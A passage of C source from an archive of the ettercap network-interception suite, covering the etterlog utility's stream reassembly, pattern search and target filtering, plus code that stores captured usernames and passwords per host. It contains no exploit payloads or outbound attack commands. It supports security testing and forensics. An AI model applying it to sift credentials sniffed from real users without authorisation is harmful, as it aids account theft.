!strcmp(u->pass, buf->pass) && !ip_addr_cmp(&u->client, &inf->client) ) { return; } } SAFE_CALLOC(u, 1, sizeof(struct active_user)); /* if there are infos copy it, else skip */ if (buf->user && buf->pass) { u->user = strdup(buf->user); u->pass = strdup(buf->pass); u->failed = inf->failed; memcpy(&u->client, &inf->client, sizeof(struct ip_addr)); } else { SAFE_FREE(u); return; } if (buf->info) u->info = strdup(buf->info); /* search the right point to inser it (ordered alphabetically) */ LIST_FOREACH(a, &(o->users_list_head), next) { if ( strcmp(a->user, u->user) > 0 ) break; last = a; } /* insert in the right position */ if (LIST_FIRST(&(o->users_list_head)) == NULL) LIST_INSERT_HEAD(&(o->users_list_head), u, next); else if (a != NULL) LIST_INSERT_BEFORE(a, u, next); else LIST_INSERT_AFTER(last, u, next); } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/utils/etterlog/el_stream.c000664 000000 000000 00000022447 13711276346 020577 0ustar00rootroot000000 000000 /* etterlog -- create, search and manipulate streams Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include /*******************************************/ /* * initialize a stream object */ void stream_init(struct stream_object *so) { TAILQ_INIT(&so->so_head); so->side1.po_off = 0; so->side2.po_off = 0; so->side1.so_curr = TAILQ_FIRST(&so->so_head); so->side2.so_curr = TAILQ_FIRST(&so->so_head); } /* * add a packet to a stream */ int stream_add(struct stream_object *so, struct log_header_packet *pck, char *buf) { struct so_list *pl, *tmp; /* skip ack packet or zero length packet */ if (pck->len == 0) return 0; /* the packet is good, add it */ SAFE_CALLOC(pl, 1, sizeof(struct so_list)); /* create the packet object */ memcpy(&pl->po.L3.src, &pck->L3_src, sizeof(struct ip_addr)); memcpy(&pl->po.L3.dst, &pck->L3_dst, sizeof(struct ip_addr)); pl->po.L4.src = pck->L4_src; pl->po.L4.dst = pck->L4_dst; pl->po.L4.proto = pck->L4_proto; SAFE_CALLOC(pl->po.DATA.data, pck->len, sizeof(char)); memcpy(pl->po.DATA.data, buf, pck->len); pl->po.DATA.len = pck->len; /* set the stream direction */ /* this is the first packet in the stream */ if (TAILQ_FIRST(&so->so_head) == TAILQ_END(&so->so_head)) { pl->side = STREAM_SIDE1; /* init the pointer to the first packet */ so->side1.so_curr = pl; so->side2.so_curr = pl; /* check the previous one and set it accordingly */ } else { tmp = TAILQ_LAST(&so->so_head, so_list_head); if (!ip_addr_cmp(&tmp->po.L3.src, &pl->po.L3.src)) /* same direction */ pl->side = tmp->side; else /* change detected */ pl->side = (tmp->side == STREAM_SIDE1) ? STREAM_SIDE2 : STREAM_SIDE1; } /* add to the queue */ TAILQ_INSERT_TAIL(&so->so_head, pl, next); return pck->len; } /* * read data from the stream * mode can be: * STREAM_SIDE1 reads only from the first side (usually client to server) * STREAM_SIDE2 reads only from the other side */ int stream_read(struct stream_object *so, u_char *buf, size_t size, int mode) { size_t buf_off = 0; size_t tmp_size = 0; struct so_list *so_curr = NULL; size_t po_off = 0; /* get the values into temp variable */ switch (mode) { case STREAM_SIDE1: so_curr = so->side1.so_curr; po_off = so->side1.po_off; break; case STREAM_SIDE2: so_curr = so->side2.so_curr; po_off = so->side2.po_off; break; } /* search the first packet matching the selected mode */ while (so_curr->side != mode) { so_curr = TAILQ_NEXT(so_curr, next); /* don't go after the end of the stream */ if (so_curr == TAILQ_END(&so->pl_head)) return 0; } /* size is decremented while it is copied in the buffer */ while (size) { /* get the size to be copied from the current po */ tmp_size = (so_curr->po.DATA.len - po_off < size) ? so_curr->po.DATA.len - po_off : size; /* fill the buffer */ memcpy(buf + buf_off, so_curr->po.DATA.data + po_off, tmp_size); /* the offset is the portion of the data copied into the buffer */ po_off += tmp_size; /* update the pointer into the buffer */ buf_off += tmp_size; /* decrement the total size to be copied */ size -= tmp_size; /* we have reached the end of the packet, go to the next one */ if (po_off == so_curr->po.DATA.len) { /* search the next packet matching the selected mode */ do { /* don't go after the end of the stream */ if (TAILQ_NEXT(so_curr, next) != TAILQ_END(&so->pl_head)) so_curr = TAILQ_NEXT(so_curr, next); else goto read_end; } while (so_curr->side != mode); /* reset the offset for the packet */ po_off = 0; } } read_end: /* restore the value in the real stream object */ switch (mode) { case STREAM_SIDE1: so->side1.so_curr = so_curr; so->side1.po_off = po_off; break; case STREAM_SIDE2: so->side2.so_curr = so_curr; so->side2.po_off = po_off; break; } /* return the total byte read */ return buf_off; } /* * move the pointers into the stream */ int stream_move(struct stream_object *so, size_t offset, int whence, int mode) { size_t tmp_size = 0; size_t move = 0; struct so_list *so_curr = NULL; size_t po_off = 0; /* get the values into temp variable */ switch (mode) { case STREAM_SIDE1: so_curr = so->side1.so_curr; po_off = so->side1.po_off; break; case STREAM_SIDE2: so_curr = so->side2.so_curr; po_off = so->side2.po_off; break; } /* no movement */ if (offset == 0) return 0; /* * the offest is calculated from the beginning, * so move to the first packet */ if (whence == SEEK_SET) { so_curr = TAILQ_FIRST(&so->so_head); po_off = 0; } /* the other mode is SEEK_CUR */ /* search the first packet matching the selected mode */ while (so_curr->side != mode) { so_curr = TAILQ_NEXT(so_curr, next); /* don't go after the end of the stream */ if (so_curr == TAILQ_END(&so->pl_head)) return 0; } while (offset) { /* get the length to jump to in the current po */ tmp_size = (so_curr->po.DATA.len - po_off < offset) ? so_curr->po.DATA.len - po_off : offset; /* update the offset */ po_off += tmp_size; /* decrement the total offset by the packet length */ offset -= tmp_size; /* update the total movement */ move += tmp_size; /* we have reached the end of the packet, go to the next one */ if (po_off == so_curr->po.DATA.len) { /* search the next packet matching the selected mode */ do { /* don't go after the end of the stream */ if (TAILQ_NEXT(so_curr, next) != TAILQ_END(&so->pl_head)) so_curr = TAILQ_NEXT(so_curr, next); else goto move_end; } while (so_curr->side != mode); /* reset the offset for the packet */ po_off = 0; } } move_end: /* restore the value in the real stream object */ switch (mode) { case STREAM_SIDE1: so->side1.so_curr = so_curr; so->side1.po_off = po_off; break; case STREAM_SIDE2: so->side2.so_curr = so_curr; so->side2.po_off = po_off; break; } return move; } /* * search a pattern into the stream * returns - NULL if not found * - the packet containing the string if found */ struct so_list * stream_search(struct stream_object *so, const char *buf, size_t buflen, int mode) { u_char *tmpbuf = NULL, *find; size_t offset = 0, len = 0; struct so_list *so_curr = NULL, *first; size_t po_off = 0; /* get the values into temp variable */ switch (mode) { case STREAM_SIDE1: so_curr = so->side1.so_curr; po_off = so->side1.po_off; break; case STREAM_SIDE2: so_curr = so->side2.so_curr; po_off = so->side2.po_off; break; } first = so_curr; /* create the buffer from the current position to the end */ for ( ; so_curr != TAILQ_END(so->so_head); so_curr = TAILQ_NEXT(so_curr, next)) { /* skip packet in the wrong side */ if (so_curr->side != mode) { po_off = 0; continue; } if (so_curr == first) len += so_curr->po.DATA.len - po_off; else len += so_curr->po.DATA.len; SAFE_REALLOC(tmpbuf, len); /* * add the packet to the end of the buffer * containing the whole conversation */ if (so_curr == first) memcpy(tmpbuf, so_curr->po.DATA.data + po_off, so_curr->po.DATA.len - po_off); else memcpy(tmpbuf + len - so_curr->po.DATA.len, so_curr->po.DATA.data, so_curr->po.DATA.len); } /* the buffer is found in the conversation */ if ((find = memmem(tmpbuf, len, buf, buflen)) != NULL) { offset = find - tmpbuf; SAFE_FREE(tmpbuf); /* move the stream pointers to the buffer found */ stream_move(so, offset, SEEK_CUR, mode); switch (mode) { case STREAM_SIDE1: return so->side1.so_curr; case STREAM_SIDE2: return so->side2.so_curr; } } SAFE_FREE(tmpbuf); return NULL; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/utils/etterlog/el_target.c000664 000000 000000 00000026127 13711276346 020571 0ustar00rootroot000000 000000 /* etterlog -- target filtering module Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include /*******************************************/ // we cannot use the libettercap functions, since theu use I/O functions, that in order // to work needs to drag in the ec_ui functions. static void add_port(void *ports, u_int n); static void add_ip(void *digit, u_int n); static int expand_range_ip(char *str, void *target); #ifdef WITH_IPV6 /* Adds IPv6 address to the target list */ static int expand_ipv6(char *str, struct target_env *target) { struct ip_addr ip; if(ip_addr_pton(str, &ip) != E_SUCCESS) ui_error("Invalid IPv6 address"); add_ip_list(&ip, target); return E_SUCCESS; } #endif /* * convert a string into a target env */ int compile_target(char *string, struct target_env *target) { #define MAC_TOK 0 #define IP_TOK 1 #ifdef WITH_IPV6 #define IPV6_TOK 2 #define PORT_TOK 3 #define MAX_TOK 4 #else #define PORT_TOK 2 #define MAX_TOK 3 #endif char valid[] = "1234567890/.,-;:ABCDEFabcdef"; char *tok[MAX_TOK]; char *p; int i = 0; // DEBUG_MSG("compile_target TARGET: %s", string); /* reset the special marker */ target->all_mac = 0; target->all_ip = 0; target->all_ip6 = 0; target->all_port = 0; /* check for invalid char */ if (strlen(string) != strspn(string, valid)) FATAL_ERROR("TARGET (%s) contains invalid chars !", string); /* TARGET parsing */ for (p = strsep(&string, "/"); p != NULL; p = strsep(&string, "/")) { tok[i++] = strdup(p); /* bad parsing */ if (i > (MAX_TOK - 1)) break; } if (i != MAX_TOK) #ifdef WITH_IPV6 FATAL_ERROR("Incorrect number of token (///) in TARGET !!"); #else FATAL_ERROR("Incorrect number of token (//) in TARGET !!"); #endif // DEBUG_MSG("MAC : [%s]", tok[MAC_TOK]); // DEBUG_MSG("IP : [%s]", tok[IP_TOK]); //#ifdef WITH_IPV6 // DEBUG_MSG("IPv6 : [%s]", tok[IPV6_TOK]); //#endif // DEBUG_MSG("PORT : [%s]", tok[PORT_TOK]); /* set the mac address */ if (!strcmp(tok[MAC_TOK], "")) target->all_mac = 1; else if (mac_addr_aton(tok[MAC_TOK], target->mac) == 0) FATAL_ERROR("Incorrect TARGET MAC parsing... (%s)", tok[MAC_TOK]); /* parse the IP range */ if (!strcmp(tok[IP_TOK], "")) target->all_ip = 1; else for(p = strsep(&tok[IP_TOK], ";"); p != NULL; p = strsep(&tok[IP_TOK], ";")) expand_range_ip(p, target); #ifdef WITH_IPV6 if(!strcmp(tok[IPV6_TOK], "")) target->all_ip6 = 1; else for(p = strsep(&tok[IPV6_TOK], ";"); p != NULL; p = strsep(&tok[IPV6_TOK], ";")) expand_ipv6(p, target); #endif /* * if only one of IP address families is specified, * the other is not automatically treated as ANY * because that is not the natural behaviour of a filter */ if (!target->all_ip || !target->all_ip6) { /* one of the IP target was specified, reset the ANY state */ target->all_ip = 0; target->all_ip6 = 0; } /* * expand the range into the port bitmap array * 1<<16 is MAX_PORTS */ if (!strcmp(tok[PORT_TOK], "")) target->all_port = 1; else { if (expand_token(tok[PORT_TOK], 1<<16, &add_port, target->ports) == -E_FATAL) FATAL_ERROR("Invalid port range"); } for(i = 0; i < MAX_TOK; i++) SAFE_FREE(tok[i]); return E_SUCCESS; } /* * set the bit of the relative port */ static void add_port(void *ports, u_int n) { u_int8 *bitmap = ports; if (n > 1<<16) FATAL_ERROR("Port outside the range (65535) !!"); BIT_SET(bitmap, n); } /* * this structure is used to contain all the possible * value of a token. * it is used as a digital clock. * an impulse is made to the last digit and it increment * its value, when it reach the maximum, it reset itself * and gives an impulse to the second to last digit. * the impulse is propagated till the first digit so all * the values are displayed as in a daytime from 00:00 to 23:59 */ struct digit { int n; int cur; u_char values[0xff]; }; /* * prepare the set of 4 digit to create an IP address */ static int expand_range_ip(char *str, void *target) { struct digit ADDR[4]; struct ip_addr tmp; struct in_addr ipaddr; char *addr[4]; char parsed_ip[16]; char *p, *q; int i = 0, j; int permut = 1; char *tok; memset(&ADDR, 0, sizeof(ADDR)); p = str; /* tokenize the ip into 4 slices */ while ((q = ec_strtok(p, ".", &tok)) ) { addr[i++] = strdup(q); /* reset p for the next strtok */ if (p != NULL) p = NULL; if (i > 3) break; } if (i != 4) FATAL_ERROR("Invalid IP format !!"); DEBUG_MSG("expand_range_ip -- [%s] [%s] [%s] [%s]", addr[0], addr[1], addr[2], addr[3]); for (i = 0; i < 4; i++) { p = addr[i]; if (expand_token(addr[i], 255, &add_ip, &ADDR[i]) == -E_FATAL) FATAL_ERROR("Invalid port range"); } /* count the free permutations */ for (i = 0; i < 4; i++) permut *= ADDR[i].n; /* give the impulses to the last digit */ for (i = 0; i < permut; i++) { snprintf(parsed_ip, 16, "%d.%d.%d.%d", ADDR[0].values[ADDR[0].cur], ADDR[1].values[ADDR[1].cur], ADDR[2].values[ADDR[2].cur], ADDR[3].values[ADDR[3].cur]); if (inet_pton(AF_INET, parsed_ip, &ipaddr) == 0) FATAL_ERROR("Invalid IP address (%s)", parsed_ip); ip_addr_init(&tmp, AF_INET,(u_char *)&ipaddr ); add_ip_list(&tmp, target); /* give the impulse to the last octet */ ADDR[3].cur++; /* adjust the other digits as in a digital clock */ for (j = 2; j >= 0; j--) { if ( ADDR[j+1].cur >= ADDR[j+1].n ) { ADDR[j].cur++; ADDR[j+1].cur = 0; } } } for (i = 0; i < 4; i++) SAFE_FREE(addr[i]); return E_SUCCESS; } /* fill the digit structure with data */ static void add_ip(void *digit, u_int n) { struct digit *buf = digit; buf->n++; buf->values[buf->n - 1] = (u_char) n; } /* * return true if the packet conform to TARGET */ int is_target_pck(struct log_header_packet *pck) { int proto = 0; int good = 0; int all_ips = 0; /* * first check the protocol. * if it is not the one specified it is * useless to parse the mac, ip and port */ if (!EL_GBL_TARGET->proto || !strcmp(EL_GBL_TARGET->proto, "") || !strcasecmp(EL_GBL_TARGET->proto, "all")) proto = 1; if (EL_GBL_TARGET->proto && !strcasecmp(EL_GBL_TARGET->proto, "tcp") && pck->L4_proto == NL_TYPE_TCP) proto = 1; if (EL_GBL_TARGET->proto && !strcasecmp(EL_GBL_TARGET->proto, "udp") && pck->L4_proto == NL_TYPE_UDP) proto = 1; /* the protocol does not match */ if (!EL_GBL_OPTIONS->reverse && proto == 0) return 0; /* * we have to check if the packet is complying with the filter * specified by the users. */ /* determine the address family of the current host */ switch (ntohs(pck->L3_src.addr_type)) { case AF_INET: all_ips = EL_GBL_TARGET->all_ip; break; case AF_INET6: all_ips = EL_GBL_TARGET->all_ip6; break; default: all_ips = 1; } /* it is in the source */ if ( (EL_GBL_TARGET->all_mac || !memcmp(EL_GBL_TARGET->mac, pck->L2_src, MEDIA_ADDR_LEN)) && ( all_ips || cmp_ip_list(&pck->L3_src, EL_GBL_TARGET) ) && (EL_GBL_TARGET->all_port || BIT_TEST(EL_GBL_TARGET->ports, ntohs(pck->L4_src))) ) good = 1; /* it is in the dest - we can assume the address family is the same as in src */ if ( (EL_GBL_TARGET->all_mac || !memcmp(EL_GBL_TARGET->mac, pck->L2_dst, MEDIA_ADDR_LEN)) && ( all_ips || cmp_ip_list(&pck->L3_dst, EL_GBL_TARGET)) && (EL_GBL_TARGET->all_port || BIT_TEST(EL_GBL_TARGET->ports, ntohs(pck->L4_dst))) ) good = 1; /* check the reverse option */ if (EL_GBL_OPTIONS->reverse ^ (good && proto) ) return 1; return 0; } /* * return 1 if the packet conform to TARGET */ int is_target_info(struct host_profile *hst) { struct open_port *o; int proto = 0; int port = 0; int host = 0; int all_ips = 0; /* * first check the protocol. * if it is not the one specified it is * useless to parse the mac, ip and port */ if (!EL_GBL_TARGET->proto || !strcmp(EL_GBL_TARGET->proto, "") || !strcasecmp(EL_GBL_TARGET->proto, "all")) proto = 1; /* all the ports are good */ if (EL_GBL_TARGET->all_port && proto) port = 1; else { LIST_FOREACH(o, &(hst->open_ports_head), next) { if (EL_GBL_TARGET->proto && !strcasecmp(EL_GBL_TARGET->proto, "tcp") && o->L4_proto == NL_TYPE_TCP) proto = 1; if (EL_GBL_TARGET->proto && !strcasecmp(EL_GBL_TARGET->proto, "udp") && o->L4_proto == NL_TYPE_UDP) proto = 1; /* if the port is open, it matches */ if (proto && (EL_GBL_TARGET->all_port || BIT_TEST(EL_GBL_TARGET->ports, ntohs(o->L4_addr))) ) { port = 1; break; } } } /* * we have to check if the packet is complying with the filter * specified by the users. */ /* determine the address family of the current host */ switch (ntohs(hst->L3_addr.addr_type)) { case AF_INET: all_ips = EL_GBL_TARGET->all_ip; break; case AF_INET6: all_ips = EL_GBL_TARGET->all_ip6; break; default: all_ips = 1; } /* check if current host matches the filter */ if ( (EL_GBL_TARGET->all_mac || !memcmp(EL_GBL_TARGET->mac, hst->L2_addr, MEDIA_ADDR_LEN)) && (all_ips || cmp_ip_list(&hst->L3_addr, EL_GBL_TARGET) ) ) host = 1; /* check the reverse option */ if (EL_GBL_OPTIONS->reverse ^ (host && port) ) return 1; else return 0; } /* * return E_SUCCESS if the user 'user' is in the user list */ int find_user(struct host_profile *hst, char *user) { struct open_port *o; struct active_user *u; if (user == NULL) return E_SUCCESS; LIST_FOREACH(o, &(hst->open_ports_head), next) { LIST_FOREACH(u, &(o->users_list_head), next) { if (strcasestr(u->user, user)) return E_SUCCESS; } } return -E_NOTFOUND; } /* EOF */ // vim:ts=3:expandtab